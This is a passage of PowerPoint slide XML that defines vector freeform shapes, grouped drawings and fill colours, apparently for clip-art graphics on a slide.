                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF660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53" name="Freeform 1797">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B902BC-6A34-4A1F-9A87-9166E2A3C4F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40" y="1214"/>
                  <a:ext cx="89" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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54" name="Oval 1798">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C59AD884-3149-4F60-9749-1A38F3B53D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flipH="1">
                  <a:off x="2429" y="1132"/>
                  <a:ext cx="119" cy="119"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFCC99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15" name="Group 2297">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0308EE21-7DBC-464A-BCF8-05F516EBF8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53871" y="1237316"/>
              <a:ext cx="1539022" cy="809943"/>
              <a:chOff x="1257" y="1893"/>
              <a:chExt cx="1180" cy="621"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1990" name="Group 1826">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFAD2F9A-3A5E-4B29-A6AE-18D1C34222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5" y="1893"/>
                <a:ext cx="642" cy="618"/>
                <a:chOff x="2634" y="1684"/>
                <a:chExt cx="1298" cy="1247"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2030" name="Freeform 1827">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E61384F1-3C6D-4704-B7EA-265934017CC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34" y="1684"/>
                  <a:ext cx="1298" cy="1247"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 258 w 1535"/>
                    <a:gd name="T1" fmla="*/ 0 h 1472"/>
                    <a:gd name="T2" fmla="*/ 0 w 1535"/>
                    <a:gd name="T3" fmla="*/ 69 h 1472"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 1131 h 1472"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 1472 h 1472"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T9" fmla="*/ 411 h 1472"/>
                    <a:gd name="T10" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T11" fmla="*/ 343 h 1472"/>
                    <a:gd name="T12" fmla="*/ 258 w 1535"/>
                    <a:gd name="T13" fmla="*/ 0 h 14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35" h="1472">
                      <a:moveTo>
                        <a:pt x="258" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="1472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6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31" name="Freeform 1828">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0CB03C7-9FF3-4224-AE01-CAE384DA4ED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34" y="2553"/>
                  <a:ext cx="1298" cy="348"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 342 h 410"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 410"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 410"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 410 h 410"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 342 h 4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5" h="410">
                      <a:moveTo>
                        <a:pt x="1535" y="342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="410"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="342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32" name="Freeform 1829">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B23FABA-0E6B-43B6-97E7-71C8CA0D04A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34" y="2331"/>
                  <a:ext cx="1298" cy="348"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 342 h 411"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 411"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 69 h 411"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 411 h 411"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 342 h 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5" h="411">
                      <a:moveTo>
                        <a:pt x="1535" y="342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="342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33" name="Freeform 1830">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E45FFC-2A6D-4F27-B45B-05069AA3650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34" y="2104"/>
                  <a:ext cx="1298" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 343 h 411"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 411"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 69 h 411"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 411 h 411"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 343 h 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5" h="411">
                      <a:moveTo>
                        <a:pt x="1535" y="343"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="343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34" name="Freeform 1831">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40147D4E-AB33-401B-92E8-7896B429576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34" y="1879"/>
                  <a:ext cx="1298" cy="348"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 340 h 408"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 408"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 408"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 408 h 408"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 340 h 4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5" h="408">
                      <a:moveTo>
                        <a:pt x="1535" y="340"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="408"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="340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2035" name="Group 1832">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE34A611-7A74-491C-A561-2931FD020EF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4" y="1741"/>
                  <a:ext cx="1082" cy="1190"/>
                  <a:chOff x="4616" y="1681"/>
                  <a:chExt cx="361" cy="397"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2037" name="Freeform 1833">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA11CFF6-96CD-49D2-91F0-51C5A28DDC43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gray">
                  <a:xfrm>
                    <a:off x="4616" y="1906"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 264 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 342 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 566 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 240 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 42 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 368 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 368 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 566 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="566"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="240"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="42"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="368"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="368"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="566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38" name="Freeform 1834">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{731307BB-1196-414D-8E4D-6DB5EA44906D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gray">
                  <a:xfrm>
                    <a:off x="4616" y="1831"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 265 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 343 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 565 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 43 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 565 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="565"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="565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39" name="Freeform 1835">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A2C7CA-C612-4BBE-9A43-0B26FD703015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gray">
                  <a:xfrm>
                    <a:off x="4616" y="1756"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 265 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 343 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 567 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 43 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 567 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="567"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="567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40" name="Freeform 1836">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B64A076-6744-409A-878A-6FF4F0F296BC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gray">
                  <a:xfrm>
                    <a:off x="4616" y="1681"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 264 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 342 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 564 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 40 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 564 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="564"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="564"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="545554"/>
                  </a:solidFill>
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="545554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036" name="Freeform 1837">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F8F99AE-5C66-4B49-A701-E2C33CD7AE5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716" y="1975"/>
                  <a:ext cx="216" cy="956"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 255"/>
                    <a:gd name="T1" fmla="*/ 68 h 1129"/>
                    <a:gd name="T2" fmla="*/ 0 w 255"/>
                    <a:gd name="T3" fmla="*/ 333 h 1129"/>
                    <a:gd name="T4" fmla="*/ 0 w 255"/>
                    <a:gd name="T5" fmla="*/ 373 h 1129"/>
                    <a:gd name="T6" fmla="*/ 0 w 255"/>
                    <a:gd name="T7" fmla="*/ 564 h 1129"/>
                    <a:gd name="T8" fmla="*/ 0 w 255"/>
                    <a:gd name="T9" fmla="*/ 597 h 1129"/>
                    <a:gd name="T10" fmla="*/ 0 w 255"/>
                    <a:gd name="T11" fmla="*/ 864 h 1129"/>
                    <a:gd name="T12" fmla="*/ 0 w 255"/>
                    <a:gd name="T13" fmla="*/ 897 h 1129"/>
                    <a:gd name="T14" fmla="*/ 0 w 255"/>
                    <a:gd name="T15" fmla="*/ 1129 h 1129"/>
                    <a:gd name="T16" fmla="*/ 255 w 255"/>
                    <a:gd name="T17" fmla="*/ 1060 h 1129"/>
                    <a:gd name="T18" fmla="*/ 255 w 255"/>
                    <a:gd name="T19" fmla="*/ 829 h 1129"/>
                    <a:gd name="T20" fmla="*/ 255 w 255"/>
                    <a:gd name="T21" fmla="*/ 796 h 1129"/>
                    <a:gd name="T22" fmla="*/ 255 w 255"/>
                    <a:gd name="T23" fmla="*/ 529 h 1129"/>
                    <a:gd name="T24" fmla="*/ 255 w 255"/>
                    <a:gd name="T25" fmla="*/ 496 h 1129"/>
                    <a:gd name="T26" fmla="*/ 255 w 255"/>
                    <a:gd name="T27" fmla="*/ 304 h 1129"/>
                    <a:gd name="T28" fmla="*/ 255 w 255"/>
                    <a:gd name="T29" fmla="*/ 264 h 1129"/>
                    <a:gd name="T30" fmla="*/ 255 w 255"/>
                    <a:gd name="T31" fmla="*/ 0 h 1129"/>
                    <a:gd name="T32" fmla="*/ 0 w 255"/>
                    <a:gd name="T33" fmla="*/ 68 h 1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55" h="1129">
                      <a:moveTo>
                        <a:pt x="0" y="68"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="333"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="564"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="597"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="864"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="897"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1129"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="1060"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="496"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="264"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="8282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91" name="Group 1838">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A52BC343-8D85-43A1-AF13-C65D2C1D5DD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66" y="2252"/>
                <a:ext cx="429" cy="262"/>
                <a:chOff x="1366" y="2294"/>
                <a:chExt cx="429" cy="262"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="2002" name="Group 1839">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3580CC-F848-48A4-BD27-9A5826E7797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21600000">
                  <a:off x="1366" y="2327"/>
                  <a:ext cx="429" cy="229"/>
                  <a:chOff x="786" y="2382"/>
                  <a:chExt cx="1190" cy="634"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2018" name="Freeform 1840">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B36FB20F-D8CE-494A-8466-1A28CBD380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933" y="2464"/>
                    <a:ext cx="43" cy="322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19" name="Freeform 1841">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
